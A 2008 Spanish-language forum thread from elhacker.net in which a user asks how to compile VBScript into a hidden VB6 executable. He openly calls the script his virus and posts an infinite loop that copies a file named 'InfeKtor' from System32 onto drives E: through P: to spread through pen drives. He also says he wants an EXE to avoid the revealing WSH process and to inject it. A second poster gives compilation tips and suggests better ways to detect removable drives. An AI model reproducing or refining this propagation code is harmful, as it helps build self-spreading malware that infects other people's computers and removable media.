elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Compilar codigo vbs en un exe en VB6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Compilar codigo vbs en un exe en VB6  (Leído 5,660 veces)
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Compilar codigo vbs en un exe en VB6
« en: 3 Octubre 2008, 15:02 pm »

Hola, me habian comentado con anterioridad lo de compilar el codigo de mi script en el VB6, pero tengo una duda...

Tengo que comenzar un proyecto exe standar o como una dll?

Porque no quiero que tenga ni formularios ni nada, solo que se ejecute, sea un procesos mas, y cumpla con lo programado; cosa que tambien tengo dudas pero no viene al tema , en todo caso mas adelante..

He intentado guardar como exe un ejemplo de reproduccion en los pen-drives o cualquier unidad, es una pavada, si quieren lo posteo. es un ejemplo mediocre pero actualmente esta batante bien.

Gracias de antemano


SALUD.O.S


En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Compilar codigo vbs en un exe en VB6
« Respuesta #1 en: 3 Octubre 2008, 15:36 pm »

Citar
Hola, me habian comentado con anterioridad lo de compilar el codigo de mi script en el VB6
Quién te ha dicho eso?  :xD :xD :xD

Proyecto exe standard, debes de colocar el código vbs, en la rutina que carga el formulario, y simplemente, pones el formulario como oculto  :P

Código
  1. Private Sub Form_Load()
  2.  
  3. 'codigo vbs
  4.  
  5. End Sub
  6.  
Saludos  ;)


« Última modificación: 3 Octubre 2008, 15:38 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Compilar codigo vbs en un exe en VB6
« Respuesta #2 en: 3 Octubre 2008, 15:46 pm »

 :xD :xD
Jaja Lo decia por vos.! jaja
Justamente, intente tambien con el sub form load y elend sub pero sin embargo sigue sin cumplir sus funciones como virus..

Probre esto y no funciona

Código:
Do
i = i +1
If i = 2 Then
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile ".C:\Windows\System32\InfeKtor", "E:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "F:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "G:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "H:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "I:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "J:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "K:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "L:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "M:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "N:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "O:\"
On error resume next
Set Plaga = CreateObject("Scripting.FileSystemObject")
Plaga.CopyFile "C:\Windows\System32\InfeKtor", "P:\"
i=0
End If
Loop

es basico, actualmente esta bastante modificado..


SALUD.O.S
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Compilar codigo vbs en un exe en VB6
« Respuesta #3 en: 3 Octubre 2008, 16:55 pm »

No veo que haya un error que impida que se ejecute bien, has probado solamente con el vbs, sin compilar  :huh:

Lo que si veo es:
1) Con crear el objeto fso una sola vez, alcanza
2) Con poner una sola vez on error resume next, alcanza
3) Hay mejores métodos de detectar las unidades extraíbles
Te recomiendo leer este excelente tuto de vbscript  :xD
TUTORIAL vbscript<---click ::)

Si es lo que has leído para aprender, vamos por mal camino  :xD

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Compilar codigo vbs en un exe en VB6
« Respuesta #4 en: 3 Octubre 2008, 19:26 pm »

.. Se que voy bien...

He inten... como exe un ejemplo de reproduccion en los pen-drives o cualquier unidad, es una pavada, si quieren lo posteo. es un ejemplo mediocre pero actualmente esta bastante bien.

Ese ejemplo estaba en mi pendrive, mi virus tambien lo tiene pero de la manera mas correcta  :¬¬ :¬¬ , El proyecto esta en mi casa.

Gracias por el manual, todo es bienvenido; pero esa es la unica forma de reproduccion que se me ocurre. que se copie asi mismo constantemente en todas las unidades.

Mas tarde o mañana te subo el codigo completo, para que me ayudes listo man?

Es que no tengo internet y estoy en la escuela; uso el internet de la escula o voy a la casa de una amiga, por eso tardo en resp.


SALUD.O.S

En línea

Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Compilar codigo vbs en un exe en VB6
« Respuesta #5 en: 3 Octubre 2008, 19:30 pm »

Ha y con respecto a ejecutarlo en forma de Script (VBS) Preferiria tenerlo en EXE ya que el proceso de WSH es muy delator  :xD

Y de ahi inyectarlo me entiendes?



SALUD.O.S
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Compilar codigo condicional
Programación C/C++
x64core 2 1,929 Último mensaje 14 Septiembre 2012, 23:57 pm
por x64core
Compilar codigo
Programación C/C++
Demereth 1 1,515 Último mensaje 22 Abril 2014, 03:34 am
por engel lex
No me quiere compilar un codigo C++ en dev c++
Programación General
Josedavid programador 123 3 2,516 Último mensaje 30 Abril 2019, 01:05 am
por huchoko
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines